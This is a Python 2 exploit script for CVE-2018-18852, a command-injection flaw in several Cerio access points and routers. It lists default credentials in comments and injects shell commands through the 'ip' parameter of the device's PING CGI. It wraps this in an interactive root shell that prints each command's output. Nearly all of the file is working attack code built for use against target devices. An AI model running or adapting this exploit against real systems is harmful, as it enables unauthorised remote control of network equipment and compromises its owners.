#!/bin/env python
import requests
from requests.auth import HTTPBasicAuth 
import json
import sys
import base64


def getToken():
    # b3BlcmF0b3I6MTIzNA== 	- operator:1234
    # YWRtaW46YWRtaW4= 		- admin:admin
    # cm9vdDpkZWZhdWx0 		- root:default
    print "not implemented, enter creds manually on the cli" 


def main():

    print '[*] ================================================'
    print '[*] Cerio RCE CVE-2018-18852, confirmed on;         '
    print '[*] - Cerio DT-300N-NGS-M - fw: Pme-CPE-AP12X V1.0.3'
    print '[*] - Cerio DT-300N       - fw: Cen-CPE-N2H10A V1.0.14, Cen-CPE-N2H10A V1.1.6, Cen-CPE-N2H10A V1.1.7'  
    print '[*] - Cerio DT-100G-N     - fw: Cen-AP-N2H10A V1.0.8'
    print '[*] - Cerio DT-100G       - fw: Cen-WR-G2H5 V1.0.7'
    print '[*] - Cerio DT-100GX-N    - fw: Cen-AP-N2H8A V1.0.18'
    print '[*] - Cerio AMR-3204G     - fw: Cen-AC V2.0.19'
    print '[*] - Cerio WMR-200N      - fw: Cen-HS-N2H1 V1.0.6c Test'
    print '[*] '
    print '[/] by hook (@hook_s3c) https://github.com/hook-s3c/CVE-2018-18852                             '
    print '[/] Greetz to vap0rsquad, ThugCrowd, $noHat$, r0bl0xgang, Udderly Amoosing, illmob, '
    print '[/] The Many Hats Club, Cyber.Phunk, WAC, SHAM, 0x00sec, John McAfee'
    print '[/] Go cop YTCracker\'s Introducing Neals, gov overreach is no joke - wake the fuck up'
    print '[*] ================================================'


    if (len(sys.argv) <= 3):
        print '[*] Usage: exploit.py <ipaddress> <port> <creds>'
        exit(0)

    host  = sys.argv[1]
    port  = sys.argv[2]
    creds = sys.argv[3]

    b64Val = base64.b64encode(creds)

    httpOrHttps = "https" if port is 443 else "http"

    while True:
        try:
            cmd = raw_input('root@cerio:~# ')
            if cmd.strip() == '':
                print '[*] Enter command below\n'
                continue
            else: 
                model = 'DT-300N-NGS-M'
                url = 'http://'+host+':'+port+'/cgi-bin/main.cgi?cgi=PING&mode=9'
                payload = {'cgi': 'PING', 'mode': 9}
                headers = {'content-type': 'application/json','Host': host,'Accept-Encoding': 'gzip, deflate', 'Content-Length' : '0', 'Connection' : 'keep-alive','Authorization': 'Basic %s' % b64Val}
 
                getPid = requests.post(url, data=payload, headers=headers)

                # thought about cycling creds for the pid token, but will leave that up to you
                # throw me a PR
                # getToken()                

                if getPid.status_code == requests.codes.not_found:
                    print "[!] This may not be the right model (DT-300N-NGS-M), trying again"
                    url = 'http://'+host+':'+port+'/cgi-bin/Save.cgi?cgi=PING'
                    getPid = requests.post(url, data=payload, headers=headers)  
                    if getPid.status_code == requests.codes.ok:
                        model = 'DT-300N'

                if getPid.status_code == requests.codes.unauthorized:
                    print "[!] Auth is invalid, try other creds"
                    exit(0)


                if getPid.status_code == requests.codes.ok:

                    # drop this where you need to for debugging
                    # print getPid.status_code 


                    binary = getPid.content 
                    output = json.loads(binary)

                    pid = output['pid'] if model is 'DT-300N-NGS-M' else output 
                    print "[+] Sucessfully grabbed pid token: %s" % pid

                    payload = {'ip': '127.0.0.1;' + 'echo "[[[";' + cmd, 'pid': pid, 'Times' : 1} 
                    getData = requests.post(url, data=payload, headers=headers)


                    output_delimiter = '[[[' if model is 'DT-300N-NGS-M' else '/html' 
                    print getData.content.split(output_delimiter)[1]

        except Exception:
            break


if __name__ == "__main__":
    main()